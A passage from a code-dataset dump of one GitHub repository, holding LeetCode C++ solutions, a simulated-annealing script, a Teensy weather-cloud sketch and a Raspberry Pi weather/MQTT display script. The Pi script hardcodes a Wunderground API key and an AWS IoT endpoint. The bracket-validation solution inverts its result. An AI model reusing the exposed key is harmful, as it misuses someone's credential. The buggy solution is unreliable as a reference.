最常见的单词\r\n\r\nclass Solution {\r\npublic:\r\n string mostCommonWord(string paragraph, vector<string>& banned) {\r\n unordered_map<string,int>mp,ban;\r\n string res, tmp;\r\n int cnt = 0;\r\n for(int i = 0; i < banned.size(); i++){\r\n ban[banned[i]]++;\r\n }\r\n for(int i = 0; i <= paragraph.size(); i++){\r\n while(isalpha(paragraph[i])) tmp += tolower(paragraph[i++]);\r\n if(ban[tmp] != 1 && tmp != \"\"){\r\n if(cnt < ++mp[tmp]){\r\n cnt = mp[tmp];\r\n res = tmp;\r\n }\r\n }\r\n tmp.clear();\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.3715847134590149, "alphanum_fraction": 0.3846994638442993, "avg_line_length": 25.787878036499023, "blob_id": "9ad0bfc88e48acd22bfa1b88a14593156b614b24", "content_id": "319d2544e5a22b6f77703d17786e93256f35b940", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 931, "license_type": "no_license", "max_line_length": 66, "num_lines": 33, "path": "/leetcode/leetcode16.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 16.最接近的三数之和\r\n\r\nclass Solution {\r\npublic:\r\n int threeSumClosest(vector<int>& nums, int target) {\r\n int res = 20000;\r\n sort(nums.begin(), nums.end());\r\n int i = 0;\r\n while (i < nums.size())\r\n {\r\n int left = i+1, right = nums.size()-1;\r\n while(left < right)\r\n {\r\n int temp = nums[i] + nums[left] + nums[right];\r\n if(abs(temp-target) < abs(res-target)){\r\n res = temp;\r\n }\r\n if(temp == target){\r\n i = nums.size();\r\n break;\r\n } else if(temp > target){\r\n right--;\r\n } else left++;\r\n }\r\n while(i < nums.size()-2 && nums[i] == nums[i+1]){i++;}\r\n i++;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.4316239356994629, "alphanum_fraction": 0.44871795177459717, "avg_line_length": 22.736841201782227, "blob_id": "684034e1811754607e34254aaf89f46f29183b6c", "content_id": "0ce763531aba0f3686fe139e8e9b8d827be5609a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 486, "license_type": "no_license", "max_line_length": 46, "num_lines": 19, "path": "/leetcode/leetcode657.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 657. 机器人能否返回原点\r\n\r\nclass Solution {\r\npublic:\r\n bool judgeCircle(string moves) {\r\n int row = 0, col = 0;\r\n for(int i = 0; i < moves.size(); i++){\r\n if(moves[i] == 'R') row++;\r\n else if(moves[i] == 'L') row--;\r\n else if(moves[i] == 'U') col++;\r\n else col--;\r\n }\r\n if(row == 0 && col == 0) return true;\r\n return false;\r\n }\r\n};" }, { "alpha_fraction": 0.3288690447807312, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 24.39215660095215, "blob_id": "d533ac1d644d8329ed3ac5e5a26b650146c86736", "content_id": "ce0aea992e93d7cba1892090995bbff5ec7ad589", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1354, "license_type": "no_license", "max_line_length": 65, "num_lines": 51, "path": "/leetcode/leetcode20.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 20. 
有效的括号\r\n\r\nclass Solution {\r\npublic:\r\n bool isValid(string s) {\r\n stack<char> stk;\r\n stk.push(s[0]);\r\n for(int i = 1;i < s.length();i++){\r\n if(!stk.empty() && check(stk.top(), s[i])) stk.pop();\r\n else stk.push(s[i]);\r\n }\r\n if(!stk.empty()) return true;\r\n else return false;\r\n\r\n }\r\n bool check(char a, char b){\r\n if(a == '(' && b ==')') return true;\r\n else if(a == '[' && b == ']') return true;\r\n else if(a == '{' && b == '}') return true;\r\n else return false;\r\n }\r\n};\r\n\r\n// class Solution {\r\n// public:\r\n// bool isValid(string s) {\r\n// if(s.size()==0)return true;\r\n// stack<char>s_;\r\n// int i=0;\r\n// while(s[i]){\r\n// if(!s_.empty()){\r\n// char a=s_.top();\r\n// if(s[i]==')'&&a=='(')\r\n// s_.pop();\r\n// else if(s[i]=='}'&&a=='{')\r\n// s_.pop();\r\n// else if(s[i]==']'&&a=='[')\r\n// s_.pop();\r\n// else\r\n// s_.push(s[i]);\r\n// }\r\n// else\r\n// s_.push(s[i]);\r\n// i++;\r\n// }\r\n// return s_.empty();\r\n// }\r\n// };" }, { "alpha_fraction": 0.46123260259628296, "alphanum_fraction": 0.47514909505844116, "avg_line_length": 22.047618865966797, "blob_id": "4041327d8f81301d6cc0491627a97cab5613b93d", "content_id": "3efe70b6d34a0034870204ce0bb3efe0eee0a095", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 521, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/leetcode/leetcode686.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 686. 重复叠加字符串匹配\r\n\r\nclass Solution {\r\npublic:\r\n int repeatedStringMatch(string a, string b) {\r\n if(a.empty() || b.empty()) return -1;\r\n int res = 1;\r\n string temp = a;\r\n int aSize = a.size(), bSize = b.size();\r\n while (temp.find(b) == string::npos)\r\n {\r\n if(temp.size() > aSize * 2 + bSize) return -1;\r\n temp += a;\r\n res++;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.4554242789745331, "alphanum_fraction": 0.47878625988960266, "avg_line_length": 27.72800064086914, "blob_id": "1e9b3c712a7432dd270e0a0940fafbda2ce8d903", "content_id": "73b3b84d04c6276f45d01bbb506e6271a0b0aeb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4046, "license_type": "no_license", "max_line_length": 101, "num_lines": 125, "path": "/python/SA.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# 计算函数 f(x,y) = 5cos(xy) + xy + y^3 的最小值\r\n# x ∈ [ -5, 5 ] y ∈ [-5,5 ]\r\nclass Particle:\r\n def __init__(self, res):\r\n self.res = res\r\n self.score = -1\r\n\r\n\r\nclass SA:\r\n def __init__(self, scoreFunc):\r\n # 评分函数\r\n self.scoreFunc = scoreFunc\r\n # 退火速率\r\n self.lamda = 0.9\r\n # 初始温度\r\n self.T = 1000\r\n # 终止条件\r\n self.Tmin = 1\r\n # 解集\r\n self.Solutions = []\r\n # 解数量\r\n self.solutionNums = 20\r\n # 最优解\r\n self.Optimal = None\r\n # 局部最优解\r\n self.localOptimal = None\r\n # 每个 T的迭代次数\r\n self.iterTimes = 100\r\n # 系数 K\r\n self.K = 1\r\n\r\n self.initialize()\r\n\r\n # 初始化\r\n def initialize(self):\r\n self.Solutions = []\r\n self.T = 1000\r\n # 根据变量范围生成初始解\r\n for i in range(self.solutionNums):\r\n res = [np.random.uniform(-5, 5), np.random.uniform(-5, 5)]\r\n particle = Particle(res)\r\n self.Solutions.append(particle)\r\n\r\n # 评价解集\r\n def score(self):\r\n self.localOptimal = self.Solutions[0]\r\n for particle in self.Solutions:\r\n # 1. 
计算能量\r\n particle.score = self.scoreFunc(particle)\r\n # 2. 更新全局最优解\r\n if particle.score > self.Optimal.score:\r\n self.Optimal = particle\r\n # 3. 更新局部最优解\r\n if particle.score > self.localOptimal.score:\r\n self.localOptimal = particle\r\n\r\n # 交换概率\r\n def Probability(self, p_old, p_new):\r\n if p_new.score > p_old.score:\r\n return 1\r\n else:\r\n return np.exp((p_old.score - p_new.score) / (self.K * self.T))\r\n\r\n # 在当前解附近搜索新解\r\n def search(self, p):\r\n x = sorted([-5, 5, p.res[0] + np.random.uniform(-1, 1)])[1]\r\n y = sorted([-5, 5, p.res[1] + np.random.uniform(-1, 1)])[1]\r\n p_new = Particle([x, y])\r\n return p_new\r\n\r\n # 迭代过程\r\n def iteration(self):\r\n n = 0\r\n while n <= self.iterTimes:\r\n # 1. 计算解集评分\r\n self.score()\r\n # 2. 扰动解集\r\n for i in range(self.solutionNums):\r\n p = self.Solutions[i]\r\n p_new = self.search(p)\r\n # 3. 依概率更新解集\r\n if (np.random.random() < self.Probability(p, p_new)):\r\n self.Solutions[i] = p_new\r\n n += 1\r\n\r\n # 降温\r\n def cooling(self):\r\n # 初始化\r\n g_scores, l_scores = [], []\r\n self.Optimal = self.Solutions[0]\r\n # 1. 判断终止条件\r\n while self.T > self.Tmin:\r\n # 2. 该温度下迭代\r\n self.iteration()\r\n # 3. 记录当前温度下的局部最优解\r\n print(f'{round(self.T, 5)}:{-round(self.localOptimal.score, 5)}:{self.localOptimal.res}')\r\n g_scores.append(-round(self.Optimal.score, 4))\r\n l_scores.append(-round(self.localOptimal.score, 4))\r\n # 4. 降温\r\n self.T *= self.lamda\r\n print(f\"最优解:{self.Optimal.res}:{-round(self.Optimal.score, 4)}\")\r\n self.display(g_scores, l_scores)\r\n\r\n # 结果可视化\r\n def display(self, res1, res2):\r\n fig, ax = plt.subplots(1, 2, figsize=(10, 4))\r\n ax[0].plot(res1, color='lightcoral')\r\n ax[0].set_title(\"Global Optimal\", color='r')\r\n ax[0].set_xlabel(\"iteration\")\r\n ax[0].set_ylabel(\"score\")\r\n\r\n ax[1].plot(res2, color='#4b5cc4')\r\n ax[1].set_title(\"Local Optimal\", color='r')\r\n ax[1].set_xlabel(\"iteration\")\r\n ax[1].set_ylabel(\"score\")\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sa = SA(lambda p: -(5 * np.cos(p.res[0] * p.res[1]) + p.res[0] * p.res[1] + pow(p.res[1], 3)))\r\n sa.cooling()\r\n\r\n \r\n" }, { "alpha_fraction": 0.38923075795173645, "alphanum_fraction": 0.41846153140068054, "avg_line_length": 20.482759475708008, "blob_id": "f214009015b61657dbc92dd80552339b61455a40", "content_id": "a4db3ca5978961b95defd92eb7192499804b4d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 658, "license_type": "no_license", "max_line_length": 60, "num_lines": 29, "path": "/leetcode/leetcode7.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 7.整数翻转\r\n\r\nclass Solution {\r\npublic:\r\n int reverse(int x){\r\n queue<int> que;\r\n int temp,count=0;\r\n long long result=0;\r\n bool flag = false;\r\n if(x<0){flag = true;}\r\n while (x != 0){\r\n temp = x%10;\r\n que.push(temp);\r\n x = x/10;\r\n count++;\r\n }\r\n while (!que.empty()){\r\n result = result + que.front()*(pow(10,--count));\r\n que.pop();\r\n }\r\n if(result>=pow(2,31)-1 || result<=-pow(2,31)){\r\n return 0;\r\n }\r\n return result;\r\n }\r\n};" }, { "alpha_fraction": 0.4656991958618164, "alphanum_fraction": 0.48218998312950134, "avg_line_length": 24.172412872314453, "blob_id": "bd17e0fdab18c0ae792735721511dabfc06a524d", "content_id": "db20962785e06daa1e4aae3de1032df30a05ef22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2118, 
"license_type": "no_license", "max_line_length": 61, "num_lines": 58, "path": "/leetcode/leetcode3.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 3.无重复最长子串\r\n\r\n// Solution 1\r\n// 从第一位扫描,每次将未出现过的字符保存进 map\r\n// 当发现重复字符,更新最大长度,从该重复字符第一次出现的位置的下一位开始扫描\r\n// 这么写结果的 时间复杂度、空间复杂度都很高\r\nclass Solution {\r\npublic:\r\n int lengthOfLongestSubstring(string s) {\r\n if (s == \"\") return 0;\r\n map<char,int> mp; // 字符、索引\r\n int res = 0, MAX_Length = 0, i = 0;\r\n int length = s.size();\r\n while (i < length) {\r\n map<char,int>:: iterator iter = mp.find(s[i]);\r\n if (iter != mp.end()) { // 出现重复字符\r\n i = iter->second + 1;\r\n mp.clear();\r\n MAX_Length = max(res, MAX_Length);\r\n res = 0;\r\n } else {\r\n mp[s[i]] = i;\r\n res += 1;\r\n i++;\r\n }\r\n }\r\n return max(res, MAX_Length);\r\n }\r\n};\r\n\r\n// Solution 2\r\n// 采用滑动窗口\r\n/* \r\n s:输入的字符串\r\n i:最长子字符串的起点数组下标\r\n j:最长子字符串的终点数组下标\r\n ans:最长子字符串长度\r\n str[]:下标(序号)表示 \"字符\",储存的值表示该字符位置+1\r\n*/\r\nint lengthOfLongestSubstring(string s) {\r\n vector<int> str(128,0); // 初始将所有值都设为0\r\n int i = 0, ans = 0;\r\n for (int j = 0;j < s.size();j++) // 在整个字符串长度之内\r\n {\r\n /* \r\n 1.如果当前字符在之前没出现过,那么其值肯定是0,不会改变当前扫描起点\r\n 2.如果s[j]出现过,则其值一定大于0:如果起点i小于str[s[j]],说明重复的字符在当前的子串内,\r\n 此时应该切换扫描起点至s[j]上一次出现位置的下一位(str[s[j]]储存的值),重新扫描\r\n */\r\n i = max(i, str[s[j]]); \r\n str[s[j]] = j + 1; // 当前字符的坐标更新\r\n ans = max(ans, j-i+1); // 比较哪个距离更大\r\n }\r\n return ans;\r\n}" }, { "alpha_fraction": 0.43491125106811523, "alphanum_fraction": 0.4467455744743347, "avg_line_length": 18, "blob_id": "5ade1709c7ca452379d5087453161af8690399e2", "content_id": "ae4da83242f6cae056c7528cc245c6522a9d012b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 346, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/leetcode/leetcode27.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 27.移出元素\r\n\r\nclass Solution {\r\npublic:\r\n int removeElement(vector<int>& nums, int val) {\r\n int k = 0;\r\n for(int i = 0;i<nums.size();i++){\r\n if(nums[i]!=val){\r\n nums[k++] = nums[i];\r\n }\r\n }\r\n return k;\r\n }\r\n};" } ]
36
abhishek11cse134/djangorestcrud
https://github.com/abhishek11cse134/djangorestcrud
6a5cadeb5ca90f634daeeef07945bd6d169629b6
c69ce5d0d2eb878ba4b28e6e5f154d1dc9dcb297
fe0e292ee5d2e9f47ecaa8eb42f0f7081b3f3a0d
refs/heads/master
2020-06-29T08:36:02.913498
2019-03-05T12:12:27
2019-03-05T12:12:27
200,488,376
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7744107842445374, "alphanum_fraction": 0.7744107842445374, "avg_line_length": 26.090909957885742, "blob_id": "438a7d21e5ad28af1b84304c9ef37b379032540c", "content_id": "ef6cd0d538eb767a0fc123a909af8857f771ad76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 67, "num_lines": 11, "path": "/Apidev/views.py", "repo_name": "abhishek11cse134/djangorestcrud", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the polls index.\")\nclass Homeview(TemplateView):\n template_name = \"home.html\"" } ]
1
Chace0219/RPI-Teensy-Weather-Monitor
https://github.com/Chace0219/RPI-Teensy-Weather-Monitor
099b982b2c9b28370d40ac4db7c3897b473a5914
8a1f5d98f46164b6eb9145db6a9e656e68ff0e3f
897208c562dfb8cb20e8cfa7bd6bbc06eef49acd
refs/heads/master
2020-03-08T16:36:12.309575
2018-04-06T21:33:19
2018-04-06T21:33:19
128,243,949
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.622558057308197, "alphanum_fraction": 0.6642093658447266, "avg_line_length": 23.889907836914062, "blob_id": "074d31d8b3d4c7d6cb1266cbe3b4ff86cfe7bb9b", "content_id": "5897e4ce8ade8aaa064f1fad95984754b471fce5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2713, "license_type": "no_license", "max_line_length": 83, "num_lines": 109, "path": "/TeensySide.ino", "repo_name": "Chace0219/RPI-Teensy-Weather-Monitor", "src_encoding": "UTF-8", "text": "// Screen Pins\n#define sclk 13\n#define mosi 11\n#define dc 9\n#define cs 10\n#define rst 8\n\n// Color definitions\n#define\tBLACK 0x0000\n#define\tBLUE 0x001F\n#define\tRED 0xF800\n#define\tGREEN 0x07E0\n#define CYAN 0x07FF\n#define MAGENTA 0xF81F\n#define YELLOW 0xFFE0 \n#define WHITE 0xFFFF\n\n//#include <Lighting.h>\n#include <avr/io.h>\n#include <avr/interrupt.h>\n#include <Adafruit_GFX.h>\n#include <Adafruit_SSD1351.h>\n#include <Adafruit_PWMServoDriver.h>\n#include <SPI.h>\n#include <Wire.h>\n#include <Stepper.h>\n#include <Lightning.h>\n#include <RainMaker.h>\n#include <WeatherCloud.h>\n\n\n//Screen library for Teensy screen\nAdafruit_SSD1351 tft = Adafruit_SSD1351(cs, dc, mosi, sclk, rst); \n\n//Start STEPPER CLOUD\nvoid CloudComplete();\nWeatherCloud weatherCloud(3, 4, 5, 6, &CloudComplete);\n\nvoid CloudComplete() {\n Serial.println(\"Cloud DONE\");\n}\n\n//Interrupt for cloud stepper motor top bounds\nvoid pin_ISR() {\n weatherCloud.HandleInterrupt();\n Serial.println(\"Interrupt complete\");\n} \n\nvoid setup() {\n Serial.begin(9600);\n\n Serial.println(\"Start cloud setup\");\n \n attachInterrupt(digitalPinToInterrupt(2), pin_ISR, CHANGE);\n \n weatherCloud.setSpeed(1600);\n weatherCloud.Initialise();\n Serial.println(\"End cloud initialise home\");\n weatherCloud.stepperStatus = FORWARD;\n\n Serial.println(weatherCloud.stepperStatus);\n Serial.println(\"End cloud setup\");\n \n Serial.print(\"hello!\");\n tft.begin();\n}\n\nvoid loop() {\n Serial.println(\"Updating Cloud\");\n weatherCloud.Update();\n \n// // Drive each servo one at a time\n// Serial.println(servonum);\n// for (uint16_t pulselen = SERVOMIN; pulselen < SERVOMAX; pulselen++) {\n// pwm.setPWM(servonum, 0, pulselen);\n// }\n//\n// //delay(500);\n// for (uint16_t pulselen = SERVOMAX; pulselen > SERVOMIN; pulselen--) {\n// pwm.setPWM(servonum, 0, pulselen);\n// }\n//\n// //delay(500);\n//\n// servonum ++;\n// if (servonum > 7) servonum = 0;\n}\n\n//// you can use this function if you'd like to set the pulse length in seconds\n//// e.g. setServoPulse(0, 0.001) is a ~1 millisecond pulse width. 
its not precise!\n//void setServoPulse(uint8_t n, double pulse) {\n// double pulselength;\n// \n// pulselength = 1000000; // 1,000,000 us per second\n// pulselength /= 60; // 60 Hz\n// Serial.print(pulselength); Serial.println(\" us per period\"); \n// pulselength /= 4096; // 12 bits of resolution\n// Serial.print(pulselength); Serial.println(\" us per bit\"); \n// pulse *= 1000;\n// pulse /= pulselength;\n// Serial.println(pulse);\n// pwm.setPWM(n, 0, pulse);\n//}\n\nvoid testdrawtext(char *text, uint16_t color) {\n tft.setCursor(0,0);\n tft.setTextColor(color);\n tft.print(text);\n}\n" }, { "alpha_fraction": 0.7051831483840942, "alphanum_fraction": 0.7310987114906311, "avg_line_length": 28.541139602661133, "blob_id": "b28ac1b38ded8c0a483f8e2b54f92c328f010bf3", "content_id": "78faeb8f9d8f19f7d4460211b464c3d5d3cad253", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9338, "license_type": "no_license", "max_line_length": 117, "num_lines": 316, "path": "/Mqtt2Arduino.py", "repo_name": "Chace0219/RPI-Teensy-Weather-Monitor", "src_encoding": "UTF-8", "text": "\n### Logging function package in order to display AWS Connection and callback messages\nimport sys\nimport logging\n\n### Time package, used to implement thread and timing in RPI\nimport time\n\n### JSON Processing Python package\nimport json\n\n### URL Processing Package, used to download images from URL provided in JSON via MQTT for user photos \nimport urllib\nimport urllib2\nimport datetime\n\nfrom PyCRC.CRC32 import CRC32\n\n'''\nInstall from pip\npip install AWSIoTPythonSDK\n\nDownload and Build from source in Git Hub\n\ngit clone https://github.com/aws/aws-iot-device-sdk-python.git\ncd aws-iot-device-sdk-python\nsudo python setup.py install\n'''\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient ## AWS IOt MQTT Client Library \n\n### SPI and GPIO package for Raspberry PI Python\n'''\nsudo apt-get update\nsudo apt-get install build-essential python-pip python-dev python-smbus git\ngit clone https://github.com/adafruit/Adafruit_Python_GPIO.git\ncd Adafruit_Python_GPIO\nsudo python setup.py install\n'''\nimport Adafruit_GPIO.SPI as SPI\n\n#SSD1351 driver port from original adafruit driver using Python. 
It is based on the SPI interface.\n'''\ngit clone https://github.com/twchad/Adafruit_Python_SSD1351.git\ncd Adafruit_Python_SSD1351\nsudo python setup.py install\n'''\nimport Adafruit_SSD1351\n\n# Image Library used for photos on screen\nimport Image\n\n\n'''\n\ttar -xzf crc16-0.1.1.tar.gz\n\tcd crc16-0.1.1\n\tpython setup.py build\n\tsudo python setup.py install\n'''\nimport crc16\n\n# this is for UART for Raspberry Pi\nimport serial # Referenced from https://pypi.python.org/pypi/pyserial/2.7 \n\nimport threading, time\n\nfrom json import load\nfrom urllib2 import urlopen\n\n'''\n\tFunction for getting public ip of current RPI\n'''\ndef GetPublicIPAddr():\n\tmy_ip = load(urlopen('http://jsonip.com'))['ip']\n\treturn my_ip\n\nWunderAPIKey = \"973c64631b35d69e\"\n\ndef GetWeatherInfo():\n\tAPIRequest = \"http://api.wunderground.com/api/\"\n\tAPIRequest += WunderAPIKey\n\tAPIRequest += \"/geolookup/conditions/astronomy/q/autoip.json?geo_ip=\"\n\tAPIRequest += GetPublicIPAddr()\n\t\n\tprint APIRequest\n\n\tf = urllib2.urlopen(APIRequest)\n\tjson_string = f.read()\n\tparsed_json = json.loads(json_string)\n\tlocation = parsed_json['location']['city']\n\ttemp_c = parsed_json['current_observation']['temp_c']\n\tweather_des = parsed_json['current_observation']['weather']\n\tprecip_today_metric = parsed_json['current_observation']['precip_today_metric']\n\tprint \"precip_today_metric %s\" % (precip_today_metric)\n\tprint \"Current temperature in %s is: %s celcius degree and %s.\" % (location, temp_c, weather_des)\n\t\n\tcurrtime = parsed_json['moon_phase']['current_time']['hour'] + \":\"\n\tcurrtime += parsed_json['moon_phase']['current_time']['minute']\n\tcurrtime += \":00\"\n\tprint \"Current time %s\" % (currtime)\n\t\n\tsunrise = parsed_json['moon_phase']['sunrise']['hour'] + \":\"\n\tsunrise += parsed_json['moon_phase']['sunrise']['minute']\n\tsunrise += \":00\"\n\tprint \"sunrise time %s\" % (sunrise)\n\n\tsunset = parsed_json['moon_phase']['sunset']['hour'] + \":\"\n\tsunset += parsed_json['moon_phase']['sunset']['minute']\n\tsunset += \":00\"\n\tprint \"sunset time %s\" % (sunset)\n\n\tmoonrise = parsed_json['moon_phase']['moonrise']['hour'] + \":\"\n\tmoonrise += parsed_json['moon_phase']['moonrise']['minute']\n\tmoonrise += \":00\"\n\tprint \"moonrise time %s\" % (moonrise)\n\n\tmoonset = parsed_json['moon_phase']['moonset']['hour'] + \":\"\n\tmoonset += parsed_json['moon_phase']['moonset']['minute']\n\tmoonset += \":00\"\n\tprint \"moonset time %s\" % (moonset)\n\n\tMyDateTime = datetime.datetime.now()\n\t#print datetime.datetime.now()\n\n\tdate = MyDateTime.strftime(\"%d/%m/%y\")\n\tprint \"current date time %s\" % (date)\n\n\tdata = {\"weatherinfo\" : {}}\n\tdata['weatherinfo']['temp_c'] = temp_c\n\tdata['weatherinfo']['date'] = date\n\tdata['weatherinfo']['weather'] = weather_des\n\tdata['weatherinfo']['precipitation'] = precip_today_metric\n\tdata['weatherinfo']['currtime'] = currtime\n\tdata['weatherinfo']['sunrise'] = sunrise\n\tdata['weatherinfo']['sunset'] = sunset\n\tdata['weatherinfo']['moonrise'] = moonrise\n\tdata['weatherinfo']['moonset'] = moonset\n\tjson_data = json.dumps(data)\n\tprint json_data\n\tf.close()\t\n\n\tUARTWrite(json_data)\n\n# Raspberry Pi pin configuration for SSD1351:\nRST0 = 5\nRST1 = 6\n# Note the following are only used with SPI:\nDC0 = 24\nDC1 = 23\n\n# SPI Port definition. 
\nSPI_PORT = 0\nSPI_DEVICE0 = 0\nSPI_DEVICE1 = 1\n\n# 128x96 display instance with hardware SPI:\nLCD0 = Adafruit_SSD1351.SSD1351_128_96(rst=RST0, dc=DC0, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE0, max_speed_hz=8000000))\nLCD1 = Adafruit_SSD1351.SSD1351_128_96(rst=RST1, dc=DC1, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE1, max_speed_hz=8000000))\n\n# Initialize library.\nLCD0.begin()\nLCD1.begin()\n\n# Clear display.\nLCD0.clear()\nLCD1.clear()\n\n## CRC16 temp variable for CRC16 CCIT \ncrc = bytearray([0, 0, 0, 0]) \n\n### UART Write function\ndef UARTWrite(data):\n\t# Serial Port open, this is different than in RPI 2 or other RPI devices.\n\t# There is an issue with the pi3 revision b\n\tserialport = serial.Serial(\"/dev/ttyS0\", 115200, timeout=0.5) # Baudrate 9600, Timeout 0.5sec\n\t# Byte Array\n\tbuff = []\n\t# get bytes from JSON data which are then sent to teensy.\n\tbuff = data.encode()\n\t#print CRC32().calculate(buff)\n\tnCRC32 = CRC32().calculate(buff)\n\tprint hex(nCRC32)\n\t\n\t# Set CRC16 variable \n\tcrc[3] = nCRC32 & 0xFF # get low byte from CRC16\n\t# get high byte from CRC16\n\tnCRC32 >>= 8\n\tcrc[2] = nCRC32 & 0xFF\n\tnCRC32 >>= 8\n\tcrc[1] = nCRC32 & 0xFF\n\tnCRC32 >>= 8\n\tcrc[0] = nCRC32 & 0xFF \n\t# Send main message\n\tprint serialport.write(buff) \n\t# Send CRC16 buffer\n\tprint serialport.write(crc) \n\n\t# Close Serial Port, so that other routines can use serial instance \n\tserialport.close()\n\ttime.sleep(0.25)\n\n# Custom MQTT message callback, if any message is arrived PI, program will call the customCallback.\ndef customCallback(client, userdata, message):\n\t# topic is in message.topic, message is in message.payload.\n\tprint(\"Received a new message: \")\n\tprint(message.payload)\n\tprint(\"from topic: \")\n\tprint(message.topic)\n\tprint(\"--------------\\n\\n\")\n\t\n\t# create a JSON Object\n\tParsingObj = json.loads(message.payload)\n\n\t### parse JSON\n\tprint ParsingObj[\"person\"][\"imageUrl\"]\n\timgurl = ParsingObj[\"person\"][\"imageUrl\"]\n\tuserID = ParsingObj[\"person\"][\"userID\"]\n\tlocationID = ParsingObj[\"person\"][\"locationID\"]\n\tuserName = ParsingObj[\"person\"][\"userName\"]\n\n\t# Create image path for Image download on PI\n\tScreenImgPath = \"Screenimage\" + str(userID)\n\tScreenImgPath = ScreenImgPath + \".jpg\"\n\n\t# \n\ttry: \n\t\t# Open URL, if the url doesn't exist, trace exception\n\t\timgdata = urllib2.urlopen(imgurl)\n\t\t# If there is no error get the image\n\t\turllib.urlretrieve(imgurl, ScreenImgPath)\n\texcept urllib2.HTTPError, e:\n\t\tprint e.code\n\t\treturn\n\texcept urllib2.URLError, e:\n\t\tprint e.args\n\t\treturn\n\n\t#Open image using stock using image library \n\timage = Image.open(ScreenImgPath).resize((128, 96), Image.ANTIALIAS)\n\n\tif userID == 1:# First display module\n\t\tLCD0.roughimage(image)\n\telif userID == 2: # Second display module\n\t\tLCD1.roughimage(image)\n\t\n\t# Write Packet mqtt message content\n\tUARTWrite(message.payload)\n\t\t\n\ninterval = 1\ncycle = 0\nTimeout = 10 # 10 sec\n\ndef GetWeatherthreadProc(e):\n\tprint('Weather thread proc is started!')\n\tcycle = 0\n\tGetWeatherInfo()\n\twhile not e.isSet():\n\t\tevent_is_set = e.wait(interval)\n\t\tcycle = cycle + 1\n\t\tif cycle > Timeout:\n\t\t\tcycle = 0\n\t\t\tGetWeatherInfo()\n\n\n# Start up routine.\n# parameters for AWS Mqtt, mainly tested using Mqtt.FX software\nhost = \"a1idvfzc1etc2l.iot.us-west-2.amazonaws.com\" # endpoint for AWS IOT thing\n\n# Root ceritficate Path\nrootCAPath = \"root-CA.crt\"\ncertificatePath = 
\"HouseyTest.cert.pem\"\nprivateKeyPath = \"HouseyTest.private.key\"\n\n\n# Configure logging, only for analysing the log of Mqtt client\n# (I probably don't need this for now because I've been using MQTT.fx for testing)\nlogger = logging.getLogger(\"AWSIoTPythonSDK.core\")\nlogger.setLevel(logging.DEBUG)\nstreamHandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nstreamHandler.setFormatter(formatter)\nlogger.addHandler(streamHandler)\n\n# Init AWSIoTMQTTClient\nmyAWSIoTMQTTClient = AWSIoTMQTTClient(\"basicPubSub\") # Client name \n# Configure with certificate setting\nmyAWSIoTMQTTClient.configureEndpoint(host, 8883)\nmyAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)\n\n# AWSIoTMQTTClient connection configuration\nmyAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)\nmyAWSIoTMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing\nmyAWSIoTMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz\nmyAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec\nmyAWSIoTMQTTClient.configureMQTTOperationTimeout(5) # 5 sec\n\n# Connect and subscribe to AWS IoT\nmyAWSIoTMQTTClient.connect() # Mqtt Client connect \n\n # set subscribe topic 